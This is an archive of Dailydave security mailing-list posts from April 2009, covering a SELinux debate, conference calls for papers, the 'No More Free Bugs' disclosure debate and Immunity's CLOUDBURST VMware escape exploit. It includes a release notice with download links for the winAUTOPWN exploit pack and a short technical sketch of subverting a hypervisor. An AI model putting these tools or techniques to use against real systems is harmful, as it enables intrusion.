From dave at immunityinc.com Wed Apr 1 15:37:08 2009
From: dave at immunityinc.com (dave)
Date: Wed, 01 Apr 2009 15:37:08 -0400
Subject: [Dailydave] http://xorl.wordpress.com/ is great.
Message-ID: <49D3C264.3020707@immunityinc.com>

"Journalism" is something that weirds me out; "Journals" come out periodically - which is another word for "too late to matter". If you're like me, you have a whole pile of things in Google Reader to go through every day. So today, in my goal to get everyone on the same page, is the consistently quality weblog http://xorl.wordpress.com/ . You could spend your time reading weblogs put out by commercial companies in thinly disguised efforts to get you to buy something, or you can read xorl and learn something.

Ideally now that he knows I read him, he won't XSS me and get my Google cookie.

-dave

From joanna at invisiblethingslab.com Wed Apr 1 16:48:47 2009
From: joanna at invisiblethingslab.com (Joanna Rutkowska)
Date: Wed, 01 Apr 2009 22:48:47 +0200
Subject: [Dailydave] In defense of Mandatory Access Control, was Re: No more Novell AppArmor?
In-Reply-To: <20090401010350.GA31661@grsecurity.net>
References: <002e01c80ee2$90d958a0$6207a8c0@jseitz> <20090326212859.GC16789@subspacefield.org> <20090401010350.GA31661@grsecurity.net>
Message-ID: <49D3D32F.7060602@invisiblethingslab.com>

Brad Spengler wrote:
> It is cool to be dismissive and aloof about "new" (9 year old)
> technologies. Otherwise you're just the SELinux version of the "year of
> Linux on the desktop!" guy. Regarding ineffectiveness (and specifically in
> regards to "proofs" and words such as "can't" and complexity/usability
> trade-offs) I won't repeat myself, since everything that needed to be
> said or demonstrated was done 2 years ago:
> http://lists.immunitysec.com/pipermail/dailydave/2007-March/004133.html
>

Let me also point out Rafal's SELinux exploit from 2003(!):
http://www.nsa.gov/research/selinux/list-archive/0306/4468.shtml

...as well as his recent exercise in SELinux default policy bypassing on Xenified FC8:
http://invisiblethingslab.com/resources/misc08/xenfb-adventures-10.pdf

These were not kernel exploits, but rather something taking advantage of an overcomplexity of the system.

Of course, the main argument against all those SELinux-like academic systems is kernel exploits, as pageexec and Brad correctly pointed out. I see that people can only argue about *how* to address that very problem (of kernel exploits), not about whether it *is* a problem. So, whether to use a "Security by Obscurity" approach (e.g. ASLR) or a "Security by Isolation" approach, that requires isolation of drivers (think VT-d). I guess we all know that "Security by Correctness" has not, and will not, work for kernel and driver code.

joanna.

From dr at kyx.net Wed Apr 1 17:29:32 2009
From: dr at kyx.net (Dragos Ruiu)
Date: Wed, 1 Apr 2009 13:29:32 -0800
Subject: [Dailydave] EUSecWest 2009 CFP (May 27/28, Deadline April 7 2009)
Message-ID: <200904011429.32505.dr@kyx.net>

Call For Papers

The EUSecWest 2009 CFP is now open. Deadline is April 7th, 2009.

EUSecWest CALL FOR PAPERS

LONDON, U.K.
-- The third annual EUSecWest applied technical security conference - where the eminent figures in the international security industry will get together to share best practices and technology - will be held in downtown London at the Sound Club in Leicester Square on May 27/28, 2009.

The most significant new discoveries about computer network hack attacks and defenses, commercial security solutions, and pragmatic real world security experience will be presented in a series of informative tutorials.

The EUSecWest meeting provides international researchers a relaxed, comfortable environment to learn from informative tutorials on key developments in security technology, and collaborate and socialize with their peers in one of the world's most important technology hubs and scenic cities. The timing of the conference allows international travelers to travel to Berlin for FX's Ph-Neutral on the weekend, and Rennes the following week for SSTIC.

We would like to announce the opportunity to submit papers, and/or lightning talk proposals for selection by the EUSecWest technical review committee. This year we will be doing one hour talks, and some shorter talk sessions. Please make your paper proposal submissions before April 7th, 2009. Some invited papers have been confirmed, but a limited number of speaking slots are still available. The conference is responsible for travel and accommodations for the speaker (one speaker airfare and one room).

If you have a proposal for a tutorial session then please email a synopsis of the material and your biography, papers and speaking background to secwest09 [at] eusecwest.com . Only slides will be needed for the paper deadline, full text does not have to be submitted - but will be accepted if available.

The EUSecWest 2009 conference consists of tutorials on technical details about current issues, innovative techniques and best practices in the information security realm. The audiences are a multi-national mix of professionals involved on a daily basis with security work: security product vendors, programmers, security officers, and network administrators. We give preference to technical details and new education for a technical audience.

The conference itself is a single track series of presentations in a lecture theater environment. The presentations offer speakers the opportunity to showcase on-going research and collaborate with peers while educating and highlighting advancements in security products and techniques. The focus is on innovation, tutorials, and education instead of product pitches. Some commercial content is tolerated, but it needs to be backed up by a technical presenter - either giving a valuable tutorial and best practices instruction or detailing significant new technology in the products.

Paper proposals should consist of the following information:

1. Presenter, and geographical location (country of origin/passport) and contact info (e-mail, postal address, phone, fax).
2. Employer and/or affiliations.
3. Brief biography, list of publications and papers.
4. Any significant presentation and educational experience/background.
5. Topic synopsis, proposed paper title, and a one paragraph description.
6. Reason why this material is innovative or significant or an important tutorial.
7. Optionally, any samples of prepared material or outlines ready.
8. Will you have full text available or only slides?
9. Language of preference for submission.
10. Please list any other publications or conferences where this material has been or will be published/submitted.

Please include the plain text version of this information in your email as well as any file, pdf, sxw, ppt, or html attachments.

Please forward the above information to secwest09 [at] eusecwest.com to be considered for placement on the speaker roster, or have your lightning talk scheduled. If you contact anyone else at our organization please ensure you also cc the submission address with your proposal or it may be omitted from the review process.

cheers,
--dr

--
World Security Pros. Cutting Edge Training, Tools, and Techniques
London, U.K. May 27/28 2009 http://eusecwest.com
pgpkey http://dragos.com/ kyxpgp

From quakerdoomer at inbox.lv Thu Apr 2 02:26:29 2009
From: quakerdoomer at inbox.lv (QUAKER DOOMER)
Date: Thu, 02 Apr 2009 09:26:29 +0300
Subject: [Dailydave] winAUTOPWN 1.7 - Now you can sleep
Message-ID: <1238653589.49d45a9509867@mail.inbox.lv>

Dear all,

As promised I am releasing winAUTOPWN version 1.7 on 1st April, completely updated, having all remote exploits of 2009 Q1 and a few before that.

The latest available release now is winAUTOPWN version 1.7
Coded by : Azim Poonawala (QUAKERDOOMER)
winAUTOPWN available at http://winautopwn.co.nr
Author's website : http://solidmecca.co.nr

winAUTOPWN is updated almost daily. Latest Release can always be downloaded from : http://winautopwn.exofire.net/ winAUTOPWN.RAR

"winAUTOPWN - WINDOWS AUTOPWN (For The True HyperSomniac H-a-c-k-e-r-z-z-z-z-Z-Z)"

Regards,
QUAKERDOOMER

From crioux at noctem.org Wed Apr 1 23:04:03 2009
From: crioux at noctem.org (Christien Rioux)
Date: Wed, 1 Apr 2009 23:04:03 -0400
Subject: [Dailydave] SOURCE Barcelona 2009 CFP now open
Message-ID: <5680af290904012004l62aa3642n848958ca20c402c8@mail.gmail.com>

All,

The SOURCE Barcelona CFP is now open.

SOURCE Conference is a technical and professional conference that combines advanced technology and application security practices with the business of security. SOURCE events are attended by senior technical executives, information security thought leaders and experts, and members of the business and security community who are looking to gain technical insight, and develop their business acumen. Please note that marketing-led presentations or presentations directly promoting a company's products will not be accepted.
Potential speakers must submit their own speaking abstracts and submissions from PR agencies will not be accepted.

Information about SOURCE Barcelona Tracks (60 Min, English Language)

Track 1: Security and Technology - Talks pertaining to new security technologies, security software, application security, secure coding practices, engineering issues surrounding security. New software releases and technology demonstrations are preferred.

Track 2: Business and Security - Talks pertaining to the business of security and critical decision-making. Entrepreneurship, issues of compliance, regulation, privacy laws, disclosure, economics.

Lightning Talks - 5-7 minute presentations on a security related subject.

Session proposals are due by May 29, 2009. Abstracts for sessions must be submitted online at the SOURCE Conference Web site. Sessions must be submitted by the speakers themselves and marketing-focused proposals will not be accepted. More information on the SOURCE Barcelona 2009 call for papers -- as well as attendee registration and sponsorship information -- can be found at http://www.sourceconference.com. Speakers will be notified by June 20, 2009.

Keynote Speakers include:
Adam Laurie
Ivan Krstić

Venue: SOURCE Barcelona will take place in Barcelona's famous Museu Nacional d'Art de Catalunya (http://www.mnac.cat). Set high on Montjuïc, the MNAC overlooks all of the city of Barcelona. SOURCE is fortunate to have the opportunity to make use of the museum's lecture halls for our sessions. SOURCE also takes place a few days before Barcelona's famed festival, La Mercè (http://www.bcn.cat/merce/en/index.shtml), so stay a few days and enjoy fireworks, human pyramids, and the festival of beasts!

Conference registration information is available at www.sourceconference.com

Questions regarding this conference may be sent to info at sourceconference dot com

Conference Manager: Stacy Thayer, Ph.D.
From vulcan.ddtek at gmail.com Thu Apr 2 13:06:53 2009
From: vulcan.ddtek at gmail.com (vulc@n ddtek)
Date: Thu, 2 Apr 2009 13:06:53 -0400
Subject: [Dailydave] Defcon 17 CTF Qualifier announced despite conficker
Message-ID: <16cb40400904021006l1c520d6al2d0ef435da94f7c2@mail.gmail.com>

try again. previous try didn't make it through...

see also: https://forum.defcon.org/showthread.php?t=10317

~~ Vulc at N

FOR IMMEDIATE RELEASE 1 APRIL 2009

DEFCON CTF QUALIFIER ANNOUNCED

Defense Diutinus Technologies Corp (ddtek) is pleased to announce the round of qualification for DEFCON 17 CTF. The competition will be held on 5-7 June - without a stop, participants can be located everywhere. All are to play, but only the 9 best groups will be invited to join us in Las Vegas for the annual DEFCON ninja square off. We also intend to honour the code of the former CTF host and automatically qualify last year's champion, the sk3wl of r00t (although we sincerely hope they participate in qualifications).

The qualification round will be in the style of a game board, but answers need not be in the form of a question. Categories will require teams to demonstrate the superiority of hacking into a vast realm of security.

You must be registered to participate.
Registration site: http://ddtek.biz/ctf/register.html
Registration opens: 01.04.2009 00:00:00 UTC
Registration ends: 04.06.2009 00:00:00 UTC
Qualifications open: 05.06.2009 23:00:00 UTC
Qualifications end: 07.06.2009 23:00:00 UTC

More information will follow via your registered email address.

Bring all your l33t haxor skillz, just leave your Kiddie toolz behind.

Vulc at n
Difensiva Senior Engineer
Diutinus Defense Technologies, Inc.
From pageexec at freemail.hu Thu Apr 2 14:01:36 2009
From: pageexec at freemail.hu (pageexec at freemail.hu)
Date: Thu, 02 Apr 2009 20:01:36 +0200
Subject: [Dailydave] In defense of Mandatory Access Control,
Message-ID: <49D4FD80.13819.3769D02D@pageexec.freemail.hu>

On 30 Mar 2009 at 16:55, Travis wrote:

> On Sat, Mar 28, 2009 at 08:48:36AM +0200, pageexec at freemail.hu wrote:
> > do 'exploitable kernel bugs' count?
>
> Searching the NVD/CVE shows 5 vulns.

you might want to re-read that 'kernel bugs' part. SELinux != kernel by any stretch of the word.

> Are there more? Possibly, I don't know.

possibly, the same search engine holds the answer. at least for those bugs that the kernel devs decided to document.

> Sure, it's bad to introduce a vulnerability. Introducing a kernel
> vulnerability is especially bad. They definitely count. Hopefully,
> as the code matures, we'll see fewer of them. Yes, it's embarrassing
> for a security enhancement to actually introduce vulnerabilities.

it's irrelevant how many bugs SELinux introduces because the rest of the kernel has orders of magnitude more itself.

> Let's address the (implied) argument here; this is kernel code, in C,
> designed to limit the scope of damage if someone seizes control of a
> program's execution context. The argument is that if there are any
> vulnerabilities introduced by the implementation, it is inherently
> flawed and must be rejected.

the argument is not about SELinux bugs but exploitable kernel bugs. any one of them completely undermines SELinux (obviously not counting those that are not reachable due to kernel or policy configuration).

seizing control of a program's execution context means that the attacker can directly exploit the kernel bugs from there. in other words, for the situation you mention, SELinux is inherently flawed (which as Peter Busser mentioned elsewhere is no surprise, MAC was designed for a different environment).

but you can prove your statement if you want: create an exploitable service on your personal box that holds your most valuable data and open up access to the internet (if you're lazy, just open up ssh and give the world a shell prompt) and keep running it for the rest of your life. make sure you apply the same SELinux policy to it that you use on your otherwise sensitive apps (such as web browser, mail/chat clients, etc).

if you actually believe your own words, then you're not going to find fake excuses for not doing this experiment. after all, SELinux protects you even 'if someone seizes control of a program's execution context', right?

> Does an exploitable implementation bug invalidate the entire
> idea/design/system? I'm not convinced that's true. If it were, the
> same argument would apply against, say, OpenSSH.

what is flawed is your use of SELinux. as for openssh, one day you might learn about the aftermath of CVE-2001-0144, then you'll be in a better position to argue about the consequences of implementation bugs.

> Even on an implementation level, I think the real question for a
> security subsystem is whether the net result is going to be an
> improvement in security or not. I think this is the core of the
> disagreements here. It's easy to count the vulnerabilities found in
> the implementation (it's also relatively easy to fix the code, once
> they are disclosed). But it's harder to quantify the benefit of
> _containing_ an intruder who manages to pop a vulnerable service.
>
> IMHO, this is what I think is really meant by "defense-in-depth"; not
> band-aids deployed in middleboxes with crossed fingers to hopefully
> protect crappy code, but a real layer of access control that can
> really limit an adversary after an intrusion. I'm still not convinced
> the idea is a bad one, even if the implementation isn't perfect.

the ball is on your side now to prove it.

From dave at immunityinc.com Thu Apr 2 15:51:42 2009
From: dave at immunityinc.com (dave)
Date: Thu, 02 Apr 2009 15:51:42 -0400
Subject: [Dailydave] OWASP Miami! You should come!
Message-ID: <49D5174E.4050508@immunityinc.com>

So I'm giving a talk at OWASP Miami's meeting tomorrow night. It's an updated version of the OWASP NYC talk I gave ("Corruption"). I'll add a discussion of Sharepoint security as well, because I think it's really interesting. Also, there will be beer, so even if you do not think it's interesting at the beginning, probably by the end you will think so.

https://www.owasp.org/index.php/Miami_Ft_Lauderdale

Date/Time - Fri. April 3rd 6PM (AKA TOMORROW NIGHT)
Meeting Location - Immunity, Inc.
1247 Alton Road
Miami Beach, FL 33139
Phone: (305) 534-9511

thanks,
Dave Aitel
Immunity, Inc.

From dave.aitel at gmail.com Sat Apr 4 16:22:39 2009
From: dave.aitel at gmail.com (Dave Aitel)
Date: Sat, 4 Apr 2009 16:22:39 -0400
Subject: [Dailydave] Immunity's CLOUDBURST
Message-ID:

If you have a CEU subscription, access it here:
http://www.immunityinc.com/ceu-index.shtml

For a quick movie:
http://www.immunityinc.com/documentation/cloudburst-vista.html

Kostya Kortchinsky's CLOUDBURST exploit is now available to CANVAS Early Update subscribers.
It is patched in the latest versions of VMware Workstation and VMware Player, etc.

Thanks,
Dave Aitel
Immunity, Inc.

From dave.aitel at gmail.com Mon Apr 6 21:01:11 2009
From: dave.aitel at gmail.com (Dave Aitel)
Date: Mon, 6 Apr 2009 21:01:11 -0400
Subject: [Dailydave] Immunity's CLOUDBURST
In-Reply-To:
References:
Message-ID:

A few people have mentioned that this was a bit terse. It's "Finals" night for a lot of people who watch college basketball I hear, so I'll leave you with just a quick bullet list and expand on it tomorrow:

1. What you're seeing in the movie is shellcode executing on a Host from a driver that runs in a Guest.
2. If you're running the latest update of Workstation, you're patched.
3. ESX/ESXi is not vulnerable, to my knowledge.
4. The exploit is amazing, and at some point Kostya will do a talk on it.
5. As you can see in the movie, the exploit defeats DEP/ASLR on Vista SP1 to go from guest to host. The exploit also works on Linux, but ScreenFlash doesn't.

More on exploits and such tomorrow.

-dave

On Sat, Apr 4, 2009 at 4:22 PM, Dave Aitel wrote:
> If you have a CEU subscription, access it here:
> http://www.immunityinc.com/ceu-index.shtml
>
> For a quick movie:
> http://www.immunityinc.com/documentation/cloudburst-vista.html
>
> Kostya Kortchinsky's CLOUDBURST exploit is now available to CANVAS
> Early Update subscribers. It is patched in the latest versions of
> VMware Workstation and VMware Player, etc.
>
> Thanks,
> Dave Aitel
> Immunity, Inc.
>

From jt at cr0.org Tue Apr 7 06:07:19 2009
From: jt at cr0.org (Julien TINNES)
Date: Tue, 7 Apr 2009 12:07:19 +0200
Subject: [Dailydave] Immunity's CLOUDBURST
In-Reply-To:
References:
Message-ID: <200904071207.19962.jt@cr0.org>

On Tuesday 07 April 2009, Dave Aitel wrote:
> A few people have mentioned that this was a bit terse. It's "Finals"
> night for a lot of people who watch college basketball I hear, so I'll
> leave you with just a quick bullet list and expand on it tomorrow:
>
> 1. What you're seeing in the movie is shellcode executing on a Host
> from a driver that runs in a Guest.
> 2. If you're running the latest update of Workstation, you're patched.
> 3. ESX/ESXi is not vulnerable, to my knowledge.
> 4. The exploit is amazing, and at some point Kostya will do a talk on it.
> 5. As you can see in the movie, the exploit defeats DEP/ASLR on Vista
> SP1 to go from guest to host. The exploit also works on Linux, but
> ScreenFlash doesn't.

That seems very cool, I can't wait for details!

However I wonder why DEP and ASLR are a problem.

- If a page is marked as executable in Guest, it'll be marked as executable in the shadow page tables (with some exceptions).
- For ASLR, well, most page table entries in guest will be mirrored in shadow page tables on host, so in this process, you know the addresses.

Hence I would say, as long as you can run unmonitored code with VMM privileges in the guest, you don't have any problem with DEP/ASLR and you can subvert the VMM easily by using the gs segment selector (whose corresponding segment is not limited, since this is how binary translated code accesses the VMM memory).

Which would suggest you are exploiting something in another process than the Guest-VMM one? Did you put your shellcode in the framebuffer (which would indeed end up in VMware's main process)? Is it another instance of bitblt overflows in virtualization software (Tavis Ormandy found a couple of them a few years ago)?

All of this is very exciting.
Julien

From yersinia.spiros at gmail.com Tue Apr 7 06:47:25 2009
From: yersinia.spiros at gmail.com (yersinia)
Date: Tue, 7 Apr 2009 12:47:25 +0200
Subject: [Dailydave] In defense of Mandatory Access Control,
In-Reply-To: <49D4FD80.13819.3769D02D@pageexec.freemail.hu>
References: <49D4FD80.13819.3769D02D@pageexec.freemail.hu>
Message-ID:

2009/4/2
> On 30 Mar 2009 at 16:55, Travis wrote:
>
> > On Sat, Mar 28, 2009 at 08:48:36AM +0200, pageexec at freemail.hu wrote:
> > > do 'exploitable kernel bugs' count?
> >
> > Searching the NVD/CVE shows 5 vulns.
>
> you might want to re-read that 'kernel bugs' part. SELinux != kernel
> by any stretch of the word.
>
> > Are there more? Possibly, I don't know.
>
> possibly, the same search engine holds the answer. at least for those
> bugs that the kernel devs decided to document.
>
> > Sure, it's bad to introduce a vulnerability. Introducing a kernel
> > vulnerability is especially bad. They definitely count. Hopefully,
> > as the code matures, we'll see fewer of them. Yes, it's embarrassing
> > for a security enhancement to actually introduce vulnerabilities.
>
> it's irrelevant how many bugs SELinux introduces because the rest of
> the kernel has orders of magnitude more itself.
>
> > Let's address the (implied) argument here; this is kernel code, in C,
> > designed to limit the scope of damage if someone seizes control of a
> > program's execution context. The argument is that if there are any
> > vulnerabilities introduced by the implementation, it is inherently
> > flawed and must be rejected.
>
> the argument is not about SELinux bugs but exploitable kernel bugs.
> any one of them completely undermines SELinux (obviously not counting
> those that are not reachable due to kernel or policy configuration).
>
> seizing control of a program's execution context means that the attacker
> can directly exploit the kernel bugs from there. in other words, for the
> situation you mention, SELinux is inherently flawed (which as Peter Busser
> mentioned elsewhere is no surprise, MAC was designed for a different
> environment).
>
> but you can prove your statement if you want: create an exploitable service
> on your personal box that holds your most valuable data and open up access
> to the internet (if you're lazy, just open up ssh and give the world a
> shell prompt) and keep running it for the rest of your life. make sure you
> apply the same SELinux policy to it that you use on your otherwise sensitive
> apps (such as web browser, mail/chat clients, etc).
>
> if you actually believe your own words, then you're not going to find fake
> excuses for not doing this experiment. after all, SELinux protects you even
> 'if someone seizes control of a program's execution context', right?
>
> > Does an exploitable implementation bug invalidate the entire
> > idea/design/system? I'm not convinced that's true. If it were, the
> > same argument would apply against, say, OpenSSH.
>
> what is flawed is your use of SELinux. as for openssh, one day you might
> learn about the aftermath of CVE-2001-0144, then you'll be in a better
> position to argue about the consequences of implementation bugs.
>
> > Even on an implementation level, I think the real question for a
> > security subsystem is whether the net result is going to be an
> > improvement in security or not. I think this is the core of the
> > disagreements here. It's easy to count the vulnerabilities found in
> > the implementation (it's also relatively easy to fix the code, once
> > they are disclosed). But it's harder to quantify the benefit of
> > _containing_ an intruder who manages to pop a vulnerable service.
> >
> > IMHO, this is what I think is really meant by "defense-in-depth"; not
> > band-aids deployed in middleboxes with crossed fingers to hopefully
> > protect crappy code, but a real layer of access control that can
> > really limit an adversary after an intrusion. I'm still not convinced
> > the idea is a bad one, even if the implementation isn't perfect.
>
> the ball is on your side now to prove it.
>

SIA

There is someone that has already done it, other than writing about this topic (http://etbe.coker.com.au/2007/10/10/how-se-linux-prevents-local-root-exploits/)

Try the selinux play machine - its only access is root with uid 0.
http://www.coker.com.au/selinux/play.html

> _______________________________________________
> Dailydave mailing list
> Dailydave at lists.immunitysec.com
> http://lists.immunitysec.com/mailman/listinfo/dailydave
>

From sqlsec at yahoo.com Tue Apr 7 14:21:47 2009
From: sqlsec at yahoo.com (Cesar)
Date: Tue, 7 Apr 2009 11:21:47 -0700 (PDT)
Subject: [Dailydave] Opening Intranets to attack by using Internet Explorer (paper)
Message-ID: <419398.13763.qm@web33005.mail.mud.yahoo.com>

Hi

Just released a new paper, I guess it will be very interesting for list members.
http://nomoreroot.blogspot.com/2009/04/opening-intranets-to-attacks-by-using.html

I will be glad to hear your feedback.

Enjoy.
Cesar.

From dave at immunityinc.com Tue Apr 7 17:07:46 2009
From: dave at immunityinc.com (dave)
Date: Tue, 07 Apr 2009 17:07:46 -0400
Subject: [Dailydave] Peas, Mash and CANVAS.
Message-ID: <49DBC0A2.1010308@immunityinc.com>

The CANVAS team (mostly Rich, in this case) did a rework of the GUI and it's BEAUTIFUL now. Or at least requires a lot less training than it used to, shall we say.
Now we get to focus on really taking advantage of the new feature set - like the built in Python commandline!
http://www.immunityinc.com/documentation/cmdlinetab.html

People see "built in XML-RPC based commandline" as "more things to learn?!?" but I see it as "Integrate with all your current tools or new tools you realize you need" and "build quick scripts to automate away all your pain" and "have a friend help you hack". :>

And, in other news: LONDON!

Immunity Inc. is proud to announce that it will be holding its first ever public CANVAS Training class in London, England. This two day class teaches students how to best use CANVAS for vulnerability exploitation and penetration testing. The hands-on exercises get students familiar with effective use of the GUI and command line interfaces, as well as advanced attack planning. We walk through the process of target discovery and reconnaissance and CANVAS node concepts. Exploit selection, client-side exploitation, and post-exploitation actions including process spawning, privilege escalation, bouncing and using MOSDEF trojans are covered in detail. Challenges such as handling network address translation (NAT), setting callbacks, attacking multiple hosts and CANVAS customization are also answered.

Location: 70 St Mary Axe, London EC3A 8BE
Dates: May 11-12, 2009
Times: 9am-5pm
Trainer: UK's own Rich Smith
Cost: $2000USD (roughly 5p) per student. Cost includes training manuals, CANVAS license*, and a certificate upon successful completion of the course.

Seats are limited so please sign up early. The deadline to enroll is Thursday April 23, 2009 by 5pm EST. If you are interested in enrolling or would like additional information please email us at admin at immunityinc.com

Thanks,
Dave Aitel
Immunity, Inc.

From pageexec at freemail.hu Tue Apr 7 18:37:02 2009
From: pageexec at freemail.hu (pageexec at freemail.hu)
Date: Wed, 08 Apr 2009 00:37:02 +0200
Subject: [Dailydave] In defense of Mandatory Access Control,
In-Reply-To:
References: <49D4FD80.13819.3769D02D@pageexec.freemail.hu>,
Message-ID: <49DBD58E.32295.5225C98C@pageexec.freemail.hu>

On 7 Apr 2009 at 12:47, yersinia wrote:

> There is someone that has already done it, other than writing about
> this topic (
> http://etbe.coker.com.au/2007/10/10/how-se-linux-prevents-local-root-exploits/
> )

which part of "(obviously not counting those that are not reachable due to kernel or policy configuration)" did you not understand? or are you perhaps suggesting that those kernels cannot be exploited because one can write a policy that maybe prevents two bugs from being reachable and there are no other kernel bugs left in there? will you please expose your own box to the net using this magic kernel? ;)

> Try the selinux play machine - its only access is root with uid 0.
> http://www.coker.com.au/selinux/play.html

so what valuable data will one find on this machine? nothing? is that all that SELinux is able to protect?

From cmiller at securityevaluators.com Wed Apr 8 12:17:29 2009
From: cmiller at securityevaluators.com (Charles Miller)
Date: Wed, 8 Apr 2009 11:17:29 -0500
Subject: [Dailydave] No more free bugs (and WOOT)
Message-ID:

Hi everybody.

You may have heard some about the No More Free Bugs campaign (http://blog.trailofbits.com/2009/03/22/no-more-free-bugs/). Basically, it is the chance for researchers to unite to get paid for the hard work we do.
As long as folks continue to give bugs to companies for free, the companies will never appreciate (or reward) the effort. So I encourage you all to stop the insanity and stop giving away your hard work. If you believe in the No More Free Bugs campaign, please include our logo (http://nomorefreebugs.org/logo.jpg) on all of your presentations at security conferences. I think it would be really great if vendors sat through an entire conference and every talk had this logo on it. I'll definitely have it on my BlackHat Europe slide deck next week. Also, I'd like to announce the CFP for the 3rd USENIX Workshop on Offensive Technologies (WOOT '09). Check it out at http://www.usenix.org/event/woot09/cfp/ . This is the only conference around that brings industry and academic security folks together. Its a chance for industry researchers to show off their work to the academic community and vice versa - I'm being very kind here to academia ;) Planning on submitting something cool to BH USA? Submit it here too and present it again a week later. It would be great if WOOT became a showcase of the best research of the previous year. By the way, I've decided instead of getting a blog or twitter account, I'll just send emails on daily dave! Take care, Charlie From sinan.eren at immunitysec.com Wed Apr 8 14:27:21 2009 From: sinan.eren at immunitysec.com (sinan.eren at immunitysec.com) Date: Wed, 8 Apr 2009 13:27:21 -0500 (EST) Subject: [Dailydave] No more free bugs (and WOOT) In-Reply-To: References: Message-ID: A campaign is not enough. As long as there is not an open and free market for vulnerabilities/exploits, fair value can never be established. ZDI/idefense being both the market maker and the sole buyer is absurd and creates broken system that nobody, serious enough, respects. Fair pricing could only be established with open markets, this is as old as day and night .... 
Also it is interesting to see on the blog commentary
(http://blog.trailofbits.com/2009/03/22/no-more-free-bugs/) certain MS drones
acknowledging the usefulness of ZDI/iDefense, but on the other hand they show
extreme efforts to take down a vulnerability auction that was on eBay, and not
just once, several times in a row (Excel anyone?)... I thought this country
favored and protected the right to establish fair value for one's creation.

-sinan

From joanna at invisiblethingslab.com Wed Apr 8 14:17:02 2009
From: joanna at invisiblethingslab.com (Joanna Rutkowska)
Date: Wed, 08 Apr 2009 20:17:02 +0200
Subject: [Dailydave] No more free bugs (and WOOT)
Message-ID: <49DCEA1E.1000405@invisiblethingslab.com>

Charles Miller wrote:
> Hi everybody.
>
> You may have heard some about the No More Free Bugs campaign
> (http://blog.trailofbits.com/2009/03/22/no-more-free-bugs/). Basically, it
> is the chance for researchers to unite to get paid for the hard work we do.
> As long as folks continue to give bugs to companies for free, the companies
> will never appreciate (or reward) the effort. So I encourage you all to stop
> the insanity and stop giving away your hard work. If you believe in the No
> More Free Bugs campaign, please include our logo
> (http://nomorefreebugs.org/logo.jpg) on all of your presentations at
> security conferences. I think it would be really great if vendors sat
> through an entire conference and every talk had this logo on it. I'll
> definitely have it on my BlackHat Europe slide deck next week.

And what exactly is your suggested way of making reasonable money on those
bugs? Assuming a legit way, of course?

joanna.

From cmiller at securityevaluators.com Wed Apr 8 14:24:01 2009
From: cmiller at securityevaluators.com (Charles Miller)
Date: Wed, 8 Apr 2009 13:24:01 -0500
Subject: [Dailydave] No more free bugs (and WOOT)
In-Reply-To: <49DCEA1E.1000405@invisiblethingslab.com>
References: <49DCEA1E.1000405@invisiblethingslab.com>
Message-ID: <105C42EC-D4F8-4B8E-BAC2-61FDAD4CA8F2@securityevaluators.com>

At this point I'm not even concerned with making "reasonable" money. I'd be
happy with researchers getting any money. (I know there are stopgap solutions
like ZDI, which is great, but buying bugs is not really their core business.)
I'd love to see what would happen if nobody reported any bugs for a year.
Would the vendors start paying? Would they even care? I don't have the
solution, I just know nothing will ever change if the status quo remains. The
only thing we can do is stop giving away our work and see what happens.

I think the ideal solution would be all the big vendors would have to
contribute to some fund (held at CERT or something) which could be used to pay
independent researchers who find and report bugs.

All I know is I think we have to draw the line now.

Charlie

On Apr 8, 2009, at 1:17 PM, Joanna Rutkowska wrote:
> And what exactly is your suggested way of making reasonable money on
> those bugs?
> Assuming a legit way, of course?
>
> joanna.

From jt at cr0.org Wed Apr 8 14:23:48 2009
From: jt at cr0.org (Julien TINNES)
Date: Wed, 8 Apr 2009 20:23:48 +0200
Subject: [Dailydave] No more free bugs (and WOOT)
Message-ID: <20090408182348.GA30844@cr0.org>

On Wed, Apr 08, 2009 at 11:17:29AM -0500, Charles Miller wrote:
> Hi everybody.
>
> You may have heard some about the No More Free Bugs campaign
> (http://blog.trailofbits.com/2009/03/22/no-more-free-bugs/). Basically, it
> is the chance for researchers to unite to get paid for the hard work we do.
> As long as folks continue to give bugs to companies for free, the companies
> will never appreciate (or reward) the effort. So I encourage you all to stop
> the insanity and stop giving away your hard work. If you believe in the No
> More Free Bugs campaign, please include our logo
> (http://nomorefreebugs.org/logo.jpg) on all of your presentations at
> security conferences. I think it would be really great if vendors sat
> through an entire conference and every talk had this logo on it. I'll
> definitely have it on my BlackHat Europe slide deck next week.

Hi,

I don't understand the point of the campaign. Why are you trying to convince
people not to report bugs responsibly directly to vendors? What harm would it
do? I can understand the reasons for a researcher to sell bugs to ZDI or
iDefense; I cannot understand how it could benefit the general public if all
security researchers would do so.
Are you trying to make vulnerability selling a bigger market so that prices go
higher?

Please, sit on vulnerabilities for months if you think this is what good
security researchers do [1], sell your bugs if you want (and there is certainly
a lot of appeal to do so), but don't try to convince everyone else this is the
way things should work!

Or next year your opponent's efforts may not fall outside the pwn2own criteria
and you may not win ;)

Julien

[1] http://www.securityfocus.com/news/11549

From cmiller at securityevaluators.com Wed Apr 8 14:43:22 2009
From: cmiller at securityevaluators.com (Charles Miller)
Date: Wed, 8 Apr 2009 13:43:22 -0500
Subject: [Dailydave] No more free bugs (and WOOT)
In-Reply-To: <20090408182348.GA30844@cr0.org>
References: <20090408182348.GA30844@cr0.org>

Hi Julien,

I think you misunderstand. I'm all for responsible disclosure. I just think
those doing the disclosure should be rewarded for their efforts. (This is how
NMFB is fundamentally different from antisecurity.is, I believe.)

As for benefiting the general public, if researchers were actually rewarded
for their work, more of them would look for (and report) vulnerabilities and
the public would actually be better off. Ask yourself the question: would more
IE bugs be found if the reward was a researcher's name in an advisory or a big
lump of cash?

I'm not entirely sure what you mean about Pwn2Own, but if you are referring to
the guy who had the already disclosed Safari bug(s), I beat him not because
his bug was already disclosed - and hence fell outside the rules - but rather
because my name was randomly selected first :p

Charlie

From joanna at invisiblethingslab.com Wed Apr 8 14:44:16 2009
From: joanna at invisiblethingslab.com (Joanna Rutkowska)
Date: Wed, 08 Apr 2009 20:44:16 +0200
Subject: [Dailydave] No more free bugs (and WOOT)
In-Reply-To: <105C42EC-D4F8-4B8E-BAC2-61FDAD4CA8F2@securityevaluators.com>
References: <49DCEA1E.1000405@invisiblethingslab.com>
 <105C42EC-D4F8-4B8E-BAC2-61FDAD4CA8F2@securityevaluators.com>
Message-ID: <49DCF080.6060705@invisiblethingslab.com>

Charles Miller wrote:
> At this point I'm not even concerned with making "reasonable" money. I'd be
> happy with researchers getting any money.

Oh?!

> (I know there are stopgap solutions like ZDI which is great, but buying bugs
> is not really their core business) I'd love to see what would happen if
> nobody reported any bugs for a year. Would the vendors start paying?

I see no incentive on their side.

> Would they even care?

Why would they?

